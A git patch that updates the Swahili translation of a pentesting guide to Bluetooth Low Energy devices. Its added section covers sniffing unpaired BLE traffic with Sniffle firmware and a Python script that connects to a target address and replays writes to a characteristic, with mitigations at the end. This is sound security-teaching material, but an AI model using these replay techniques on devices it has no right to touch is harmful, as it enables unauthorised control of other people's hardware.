From 4f972a6871768f282ab93c847f5349224631a2e3 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Thu, 28 Aug 2025 14:38:44 +0000
Subject: [PATCH] Translated ['',
 'src/todo/radio-hacking/pentesting-ble-bluetooth-low-ene

---
 .../pentesting-ble-bluetooth-low-energy.md    | 139 ++++++++++++++++--
 1 file changed, 130 insertions(+), 9 deletions(-)

diff --git a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
index 9c88bbaaa..2c9d00df3 100644
--- a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
+++ b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -2,23 +2,23 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Introduction
+## Utangulizi
 
-Inapatikana tangu spesifikasiyo ya Bluetooth 4.0, BLE inatumia tu vituo 40, ikifunika anuwai ya 2400 hadi 2483.5 MHz. Kinyume chake, Bluetooth ya jadi inatumia vituo 79 katika anuwai hiyo hiyo.
+Iliyopatikana tangu muundo wa Bluetooth 4.0, BLE hutumia chaneli 40 tu, zikiwafunika anuwai ya 2400 hadi 2483.5 MHz. Kwa kulinganisha, Bluetooth ya jadi hutumia chaneli 79 katika anuwai ile ile.
 
-Vifaa vya BLE vinawasiliana kwa kutuma **advertising packets** (**beacons**), hizi pakiti zinatangaza uwepo wa kifaa cha BLE kwa vifaa vingine vya karibu. Beacons hizi wakati mwingine **zinasambaza data** pia.
+Vifaa vya BLE huwasiliana kwa kutuma **paketi za matangazo** (**beacons**), paketi hizi hutangaza uwepo wa kifaa cha BLE kwa vifaa vingine vilivyokaribu. Beacons hizi wakati mwingine pia **hutuma data**.
 
-Kifaa kinachosikiliza, pia kinachoitwa kifaa cha kati, kinaweza kujibu pakiti ya matangazo kwa **SCAN request** iliyotumwa mahsusi kwa kifaa kinachotangaza. **Jibu** kwa skani hiyo linatumia muundo sawa na pakiti ya **advertising** pamoja na taarifa za ziada ambazo hazikuweza kufanywa kwenye ombi la matangazo la awali, kama vile jina kamili la kifaa.
+Kifaa kinachosikiliza, kinachoitwa pia kifaa cha kati, kinaweza kujibu paketi ya matangazo kwa **SCAN request** iliyotumwa maalum kwa kifaa kinachoatangaza. **Response** ya skani hiyo inatumia muundo ule ule wa paketi ya **advertising** pamoja na taarifa za ziada ambazo hazikuweza kuingia kwenye ombi la matangazo la awali, kama jina kamili la kifaa.
 
 ![](<../../images/image (152).png>)
 
-Byte ya preamble inasawazisha masafa, wakati anwani ya ufikiaji ya byte nne ni **identifier ya muunganisho**, ambayo inatumika katika hali ambapo vifaa vingi vinajaribu kuanzisha muunganisho kwenye vituo sawa. Kisha, Kitengo cha Data ya Protokali (**PDU**) kina **data za matangazo**. Kuna aina kadhaa za PDU; zile zinazotumika sana ni ADV_NONCONN_IND na ADV_IND. Vifaa vinatumia aina ya PDU ya **ADV_NONCONN_IND** ikiwa **havikubali muunganisho**, vinatoa data tu katika pakiti ya matangazo. Vifaa vinatumia **ADV_IND** ikiwa **vinakubali muunganisho** na **vinaacha kutuma matangazo** mara tu **muunganisho** umepatikana.
+Byte ya preamble inalinganisha mzunguko wa frequency, wakati anwani ya upatikanaji ya bytes nne ni **kitambulisho cha connection**, ambacho kinatumika katika matukio ambapo vifaa vingi vinajaribu kuanzisha connections kwenye chaneli zile zile. Ifuatayo, Protocol Data Unit (**PDU**) ina **data ya matangazo**. Kuna aina kadhaa za PDU; zilizotumika sana ni ADV_NONCONN_IND na ADV_IND. Vifaa vinatumia aina ya PDU **ADV_NONCONN_IND** ikiwa havukubali connections, vikituma data tu kwenye paketi ya matangazo. Vifaa vinatumia **ADV_IND** ikiwa vinaruhusu connections na **kuacha kutuma paketi za matangazo** mara tu **connection** itakapokuwa **imeanzishwa**.
 
 ### GATT
 
-**Profaili ya Sifa ya Kijeni** (GATT) inaelezea jinsi **kifaa kinapaswa kuunda na kuhamasisha data**. Unapokuwa unachambua uso wa shambulio la kifaa cha BLE, mara nyingi utaelekeza umakini wako kwenye GATT (au GATTs), kwa sababu ndivyo **ufanyaji kazi wa kifaa unavyoanzishwa** na jinsi data inavyohifadhiwa, kuunganishwa, na kubadilishwa. GATT inataja sifa, maelezo, na huduma za kifaa katika jedwali kama thamani za 16- au 32-bits. **Sifa** ni thamani ya **data** inayotumwa kati ya kifaa cha kati na cha pembeni. Sifa hizi zinaweza kuwa na **maelezo** ambayo **yanatoa taarifa za ziada kuhusu hizo**. **Sifa** mara nyingi **zinaunganishwa** katika **huduma** ikiwa zinahusiana na kutekeleza hatua maalum.
+The **Generic Attribute Profile** (GATT) inafafanua jinsi **kifaa kinavyopaswa kuunda muundo na kuhamisha data**. Unapokuwa unachambua uso wa shambulio wa kifaa cha BLE, mara nyingi utaelekeza umakini wako kwenye GATT (au GATTs), kwa sababu ndicho jinsi **utendaji wa kifaa unavyochochewa** na jinsi data inavyohifadhiwa, kuunganishwa, na kubadilishwa. GATT inaorodhesha sifa (characteristics), descriptors, na services za kifaa kwenye jedwali kama thamani za 16- au 32-bits. Sifa (**characteristic**) ni thamani ya **data** inayo **tumwa** kati ya kifaa cha kati na peripheral. Sifa hizi zinaweza kuwa na **descriptors** zinazotoa **taarifa za ziada juu yao**. **Characteristics** mara nyingi **huwekwa pamoja** katika **services** ikiwa zinahusiana na kutekeleza kitendo fulani.
 
-## Enumeration
+## Uorodheshaji
 ```bash
 hciconfig #Check config, check if UP or DOWN
 # If DOWN try:
@@ -30,8 +30,8 @@ spooftooph -i hci0 -a 11:22:33:44:55:66
 ```
 ### GATTool
 
-**GATTool** inaruhusu **kuanzisha** **muunganisho** na kifaa kingine, kuorodhesha **sifa** za kifaa hicho, na kusoma na kuandika sifa zake.\
-GATTTool inaweza kuzindua shell ya mwingiliano kwa chaguo la `-I`:
+**GATTool** inaruhusu **kuanzisha** **muunganisho** na kifaa kingine, ikiorodhesha **characteristics** za kifaa hicho, na kusoma na kuandika **attributes** zake.\
+GATTTool inaweza kuanzisha shell ya mwingiliano kwa chaguo la `-I`:
 ```bash
 gatttool -i hci0 -I
 [ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
@@ -64,4 +64,125 @@ sudo bettercap --eval "ble.recon on"
 >> ble.write <MAC ADDR> <UUID> <HEX DATA>
 >> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
 ```
+## Sniffing na kudhibiti moja kwa moja vifaa vya BLE visivyo na pairing
+
+Vifaa vingi vya BLE vya bei nafuu havutekelezi pairing/bonding. Bila bonding, Link Layer encryption haiwezwi kamwe, hivyo ATT/GATT traffic iko kwa cleartext. Off-path sniffer inaweza kufuatilia connection, decode GATT operations ili kupata characteristic handles na values, na host yeyote uliye karibu anaweza kisha kuungana na ku-replay hizo writes ili kudhibiti kifaa.
+
+### Sniffing na Sniffle (CC26x2/CC1352)
+
+Hardware: Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) iliyoflashwa tena na NCC Group’s Sniffle firmware.
+
+Sakinisha Sniffle na Wireshark extcap yake kwenye Linux:
+```bash
+if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then
+echo "[+] - Sniffle not installed! Installing at 1.10.0..."
+sudo mkdir -p /opt/sniffle
+sudo chown -R $USER:$USER /opt/sniffle
+pushd /opt/sniffle
+wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz
+tar xvf v1.10.0.tar.gz
+# Install Wireshark extcap for user and root only
+mkdir -p $HOME/.local/lib/wireshark/extcap
+ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap
+sudo mkdir -p /root/.local/lib/wireshark/extcap
+sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap
+popd
+else
+echo "[+] - Sniffle already installed at 1.10.0"
+fi
+```
+Flash Sonoff na firmware ya Sniffle (hakikisha kifaa chako cha serial kinalingana, kwa mfano /dev/ttyUSB0):
+```bash
+pushd /opt/sniffle/
+wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
+git clone https://github.com/sultanqasim/cc2538-bsl.git
+cd cc2538-bsl
+python3 -m venv .venv
+source .venv/bin/activate
+python3 -m pip install pyserial intelhex
+python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex
+deactivate
+popd
+```
+Chukua katika Wireshark kupitia Sniffle extcap na quickly pivot to state-changing writes kwa kuchuja:
+```text
+_ws.col.info contains "Sent Write Command"
+```
+Hii inaonyesha ATT Write Commands kutoka kwa client; handle na value mara nyingi zinafananishwa moja kwa moja na vitendo vya kifaa (kwa mfano, andika 0x01 kwenye buzzer/alert characteristic, 0x00 kuacha).
+
+Sniffle CLI mifano ya haraka:
+```bash
+python3 scanner.py --output scan.pcap
+# Only devices with very strong signal
+python3 scanner.py --rssi -40
+# Filter advertisements containing a string
+python3 sniffer.py --string "banana" --output sniff.pcap
+```
+Alternative sniffer: Nordic’s nRF Sniffer for BLE + Wireshark plugin pia hufanya kazi. Kwa dongle ndogo/bei nafuu za Nordic mara nyingi unaandika juu bootloader ya USB ili kupakia firmware ya sniffer, hivyo au unahifadhi dongle maalum ya sniffer au unahitaji J-Link/JTAG kurejesha bootloader baadaye.
+
+### Udhibiti hai kupitia GATT
+
+Mara tu utakapobaini writable characteristic handle na value kutoka kwa trafiki iliyosniffwa, ungana kama central yoyote na fanya write ileile:
+
+- With Nordic nRF Connect for Desktop (BLE app):
+- Chagua dongle ya nRF52/nRF52840, scan na connect kwenye target.
+- Vinjari GATT database, tafuta target characteristic (mara nyingi ina jina la kirafiki, e.g., Alert Level).
+- Fanya Write na bytes zilizosniffwa (e.g., 01 to trigger, 00 to stop).
+
+- Otomatisha kwenye Windows kwa dongle ya Nordic ukitumia Python + blatann:
+```python
+import time
+import blatann
+
+# CONFIG
+COM_PORT = "COM29"  # Replace with your COM port
+TARGET_MAC = "5B:B1:7F:47:A7:00"  # Replace with your target MAC
+
+target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p")
+
+# CONNECT
+ble_device = blatann.BleDevice(COM_PORT)
+ble_device.configure()
+ble_device.open()
+print(f"[-] Connecting to {TARGET_MAC}...")
+peer = ble_device.connect(target_address).wait()
+if not peer:
+print("[!] Connection failed.")
+ble_device.close()
+raise SystemExit(1)
+
+print("Connected. Discovering services...")
+peer.discover_services().wait(5, exception_on_timeout=False)
+
+# Example: write 0x01/0x00 to a known handle
+for service in peer.database.services:
+for ch in service.characteristics:
+if ch.handle == 0x000b:  # Replace with your handle
+print("[!] Beeping.")
+ch.write(b"\x01")
+time.sleep(2)
+print("[+] And relax.")
+ch.write(b"\x00")
+
+print("[-] Disconnecting...")
+peer.disconnect()
+peer.wait_for_disconnect()
+ble_device.close()
+```
+### Vidokezo vya uendeshaji na hatua za kupunguza
+
+- Tumia Sonoff+Sniffle kwenye Linux kwa channel hopping na connection following imara. Weka Nordic sniffer mbadala kama backup.
+- Bila pairing/bonding, attacker yeyote aliye karibu anaweza observe writes na replay/craft zao kwa unauthenticated writable characteristics.
+- Hatua za kupunguza: lazimisha pairing/bonding na uweke encryption; weka ruhusa za characteristic ili ziwe zinahitaji authenticated writes; punguza unauthenticated writable characteristics kadiri iwezekanavyo; thibitisha GATT ACLs kwa kutumia Sniffle/nRF Connect.
+
+## References
+
+- [Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners](https://www.pentestpartners.com/security-blog/start-hacking-bluetooth-low-energy-today-part-2/)
+- [Sniffle – A sniffer for Bluetooth 5 and 4.x LE](https://github.com/nccgroup/Sniffle)
+- [Firmware installation for Sonoff USB Dongle (Sniffle README)](https://github.com/nccgroup/Sniffle?tab=readme-ov-file#firmware-installation-sonoff-usb-dongle)
+- [Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)](https://sonoff.tech/en-uk/products/sonoff-zigbee-3-0-usb-dongle-plus-zbdongle-p)
+- [Nordic nRF Sniffer for Bluetooth LE](https://www.nordicsemi.com/Products/Development-tools/nRF-Sniffer-for-Bluetooth-LE)
+- [nRF Connect for Desktop](https://www.nordicsemi.com/Products/Development-tools/nRF-Connect-for-desktop)
+- [blatann – Python BLE library for Nordic devices](https://blatann.readthedocs.io/en/latest/)
+
 {{#include ../../banners/hacktricks-training.md}}